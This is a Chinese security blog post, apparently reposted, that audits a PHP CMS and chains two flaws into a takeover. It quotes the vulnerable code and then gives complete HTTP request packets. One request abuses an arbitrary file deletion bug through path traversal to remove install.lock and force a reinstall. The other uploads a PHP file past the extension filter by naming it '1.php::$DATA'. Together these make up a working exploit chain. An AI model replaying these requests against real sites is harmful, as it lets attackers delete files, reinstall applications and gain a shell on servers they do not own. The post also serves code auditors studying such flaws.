QQ:1272460312
黑客与极客相关,互联网安全领域里的热点话题
漏洞、技术相关的调查或分析
稿件通过并发布还能收获200-800元不等的稿酬
审计源码,发现漏洞
/application/index/controller/system/SystemUpgradeclient.php中的setcopydel方法可以任意提交参数。id,一个是idsif (is_array($post['ids'])) {foreach ($post['ids'] as $file) {$fileservice->del_dir(ROOT_PATH . 'public' . DS . 'copyfile' . $file);}}if ($post['id']) {$copyFile = ROOT_PATH . 'public' . DS . 'copyfile' . $post['id'];// echo $copyFile;exit;$fileservice->del_file($copyFile);}
ids是需要数组的,然后拼接路径,传入$fileservice->del_dir()方法中。id没有类型判断,直接拼接路径传入$fileservice->del_file()方法中。$fileservice->del_dir()方法是删除目录删除目录,看来这是一个任意文件删除漏洞,分析下源码。
static function del_dir($dirName){if (!file_exists($dirName)) # 判断文件或目录是否存在,不存在就返回false{return false;}$dir = opendir($dirName); # 打开一个目录,读取它的内容while ($fileName = readdir($dir)){$file = $dirName . '/' . $fileName;if ($fileName != '.' && $fileName != '..'){if (is_dir($file)) # 判断是不是目录,是目录就在调用一次本身方法{self::del_dir($file);}else{unlink($file); # 删除文件}}}closedir($dir);return rmdir($dirName); # 删除目录}
$fileservice->del_file()方法是删除文件\application\admin\controller\setting\SystemConfig.php中的发现了view_upload上传的方法。type为3的时候是上传文件的,然后传入Upload::file方法。php,但是在win的系统中,可以通过以下的一些方法绕过。.php..php(空格).php:1.jpg.php::$DATA.php::$DATA…….等等、、、
1.php::$DATA这样的方式可以绕过,构造的post数据包为:POST /index.php/admin/setting.system_config/view_upload.html HTTP/1.1Host: xxx.comContent-Length: 403Cache-Control: max-age=0Origin: http://xxx.comUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryP7jKNcoemK2sybZbUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://xxx.com/index.php/admin/setting.system_config/index_alone?tab_id=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=es9ef1h1c9i0t21brcrlqigfmtConnection: close------WebKitFormBoundaryP7jKNcoemK2sybZbContent-Disposition: form-data; name="file"site_logo------WebKitFormBoundaryP7jKNcoemK2sybZbContent-Disposition: form-data; name="type"3------WebKitFormBoundaryP7jKNcoemK2sybZbContent-Disposition: form-data; name="site_logo"; filename="1.php::$DATA"Content-Type: image/png<?phpphpinfo();?>------WebKitFormBoundaryP7jKNcoemK2sybZb--
install文件,根据经验知道程序安装文件都会在安装后创建一个文件,来判断是否已经安装,所以在看看是否和我想的一样。install.lock文件来判断是否安装成功,那么我们可以通过之前的任意文件删除漏洞来删除这个文件让系统进行重装。利用漏洞拿到shell
install.lock文件的数据包:POST /index.php/admin/system.System_Upgradeclient/setcopydel HTTP/1.1Host: www.xxx.wangContent-Length: 26Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://www.xxx.wangContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.xxx.wang/index.php/admin/system.System_Upgradeclient/setcopydelAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8itmp7itfo1va6uu7bu0ouhgosConnection: closeid=/../install/install.lock&ids=1
文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652871107&idx=1&sn=37377424f20890e987d58415ff88256e&chksm=bd59e50e8a2e6c18a1c8a7e4ab4f4ed571b2ce1dbda5795756f9fb44cb2173119f143e93dd98#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh